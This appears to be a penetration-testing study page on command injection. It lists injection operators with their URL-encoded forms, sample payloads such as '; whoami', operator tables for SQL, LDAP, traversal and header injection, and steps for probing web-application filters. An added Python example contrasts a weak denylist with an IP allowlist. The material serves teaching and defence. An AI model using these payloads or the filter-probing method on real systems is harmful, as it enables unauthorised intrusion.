
filter-identification

Types of injections

  1. OS command injection

  2. Code injection

  3. SQL injections

  4. XSS/HTML injection

Other types of injections

  1. LDAP injection

  2. NoSQL injection

  3. HTTP header injection

  4. XPath injection

  5. IMAP injection

  6. ORM injection

Detection

  • Try to inject commands through various injection methods.

  • Observe the changes in the output.

  • Use any of the command injection methods below to inject another command so that both or either of the commands are executed.

  • NOTE: The semicolon (;) will not work if the command is executed with the Windows command line.

Command injection methods

Injection Operator   Injection Character   URL-Encoded Character   Executed Command
------------------   -------------------   ---------------------   ----------------
Semicolon            ;                     %3b or %3B              Both
New Line             \n (use decode)       %0a                     Both
Background           &                     %26                     Both (second output generally shown first)
Pipe                 |                     %7c                     Both (only second output is shown)
AND                  &&                    %26%26                  Both (only if first succeeds)
OR                   ||                    %7c%7c                  Second (only if first fails)
Sub-Shell            ``                    %60%60                  Both (Linux-only)
Sub-Shell            $()                   %24%28%29               Both (Linux-only)

Injecting commands

Semi-colon injection

Add a semicolon after the IP address, followed by any other command.

  • ; whoami

AND injection

  • && whoami (it runs only when the first command succeeds)

OR injection

  • || whoami (it runs only when the first command fails)

Various injection types

Injection Type                            Operators
---------------------------------------   --------------------------------
SQL Injection                             ' , ; -- /* */
Command Injection                         ; &&
LDAP Injection                            * ( ) & |
XPath Injection                           ' or and not substring concat count
OS Command Injection                      ; & |
Code Injection                            ' ; -- /* */ $() ${} #{} %{} ^
Directory Traversal/File Path Traversal   ../ ..\\ %00
Object Injection                          ; & |
XQuery Injection                          ' ; -- /* */
Shellcode Injection                       \x \u %u %n
Header Injection                          \n \r\n \t %0d %0a %09

Filter Evasion

Identifying filters

WAF detection:

  • If we get an error message such as "invalid input" or "blocked", it indicates that a web application security mechanism was triggered.

  • Analyze what is blocked and what is not on the web application by trying different injection methods and commands.

  • A web application may have blacklisted characters, and if the command contains any of them, it will deny the request.

  • Reduce the request by one character at a time and see when it gets blocked.
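
Why a character blacklist is a weak control, as an added example that is not part of the original page: a hypothetical three-character denylist is checked against the operators from the table above, next to an allowlist check that parses the IP address and builds an argv list with no shell involved. The sample inputs, the denylist contents and all function names are constructed for illustration.

```python
import ipaddress

# Constructed sample inputs for an "IP address" field, one per operator in the table.
SAMPLES = {
    "semicolon": "127.0.0.1; whoami",
    "newline": "127.0.0.1\nwhoami",
    "background": "127.0.0.1 & whoami",
    "pipe": "127.0.0.1 | whoami",
    "and": "127.0.0.1 && whoami",
    "or": "127.0.0.1 || whoami",
    "backticks": "127.0.0.1 `whoami`",
    "subshell": "127.0.0.1 $(whoami)",
}

# Hypothetical incomplete denylist (assumption): only three characters are blocked.
DENYLIST = (";", "&", "|")


def denylist_accepts(value):
    """Weak check: reject only when a blacklisted character is present."""
    return not any(ch in value for ch in DENYLIST)


def allowlist_accepts(value):
    """Strong check: accept only a syntactically valid IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def build_ping_argv(value):
    """Return an argv list for ping; the value is never placed in a shell string."""
    addr = ipaddress.ip_address(value)  # raises ValueError for anything but an IP
    return ["ping", "-c", "1", str(addr)]


def audit():
    """Map each operator name to (denylist_accepts, allowlist_accepts)."""
    return {name: (denylist_accepts(v), allowlist_accepts(v))
            for name, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, (deny_ok, allow_ok) in audit().items():
        print(f"{name:<11} denylist_accepts={deny_ok!s:<5} allowlist_accepts={allow_ok}")
```

Passing the list from build_ping_argv to subprocess.run without shell=True keeps the operators from being interpreted at all, so the validation is a second layer rather than the only one.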
